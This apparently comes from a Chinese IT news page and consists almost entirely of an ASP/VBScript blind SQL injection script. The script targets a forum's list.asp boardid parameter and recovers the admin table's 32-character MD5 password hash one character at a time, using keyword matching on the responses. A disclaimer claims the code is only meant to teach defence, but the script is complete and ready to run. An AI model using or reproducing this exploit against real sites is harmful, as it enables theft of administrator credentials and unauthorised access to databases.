IDC资讯中心
请勿用于非法用途,本代码只是为了让广大asp爱好者明白原理,防范于未然。
function bytes2bstr(vin)
dim strreturn
dim i,thischarcode,nextcharcode
strreturn = ""
for i = 1 to lenb(vin)
thischarcode = ascb(midb(vin,i,1))
if thischarcode < &h80 then
strreturn = strreturn & chr(thischarcode)
else
nextcharcode = ascb(midb(vin,i+1,1))
strreturn = strreturn & chr(clng(thischarcode) * &h100 + cint(nextcharcode))
i = i + 1
end if
next
bytes2bstr = strreturn
end function
function gethttppage(url)
dim http
set http=createobject("msxml2.xmlhttp")
http.open "get",url,false
http.send()
if http.readystate<>4 then
exit function
end if
gethttppage=bytes2bstr(http.responsebody)
set http=nothing
if err.number<>0 then err.clear
end function
function regexptest(patrn, strng)
dim regex, retval 建立变量。
set regex = new regexp 建立正则表达式。
regex.pattern = patrn 设置模式。
regex.ignorecase = false 设置是否区分大小写。
regexptest = regex.test(strng) 执行搜索测试。
end function
password=""
keyword="论坛首页"返回正确页面会出现的字符串
url1="http://qq/bbs/list.asp?boardid=7"sql注入入口
passlen=32md5密码通常是32位
dim pass
pass=array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102)密码值通常是0-9,a-f
server.scripttimeout=999
for i=1 to passlen
flag=false
url=url1&" and (select asc(mid(password,"&i&",1)) from admin where id>0)="构造的sql语句这里才是关键
for j=0 to ubound(pass)
str=gethttppage(url&pass(j))
flag=regexptest(keyword,str)
if flag=true then
password=password&chr(pass(j))
exit for
end if
next
next
response.write(password)
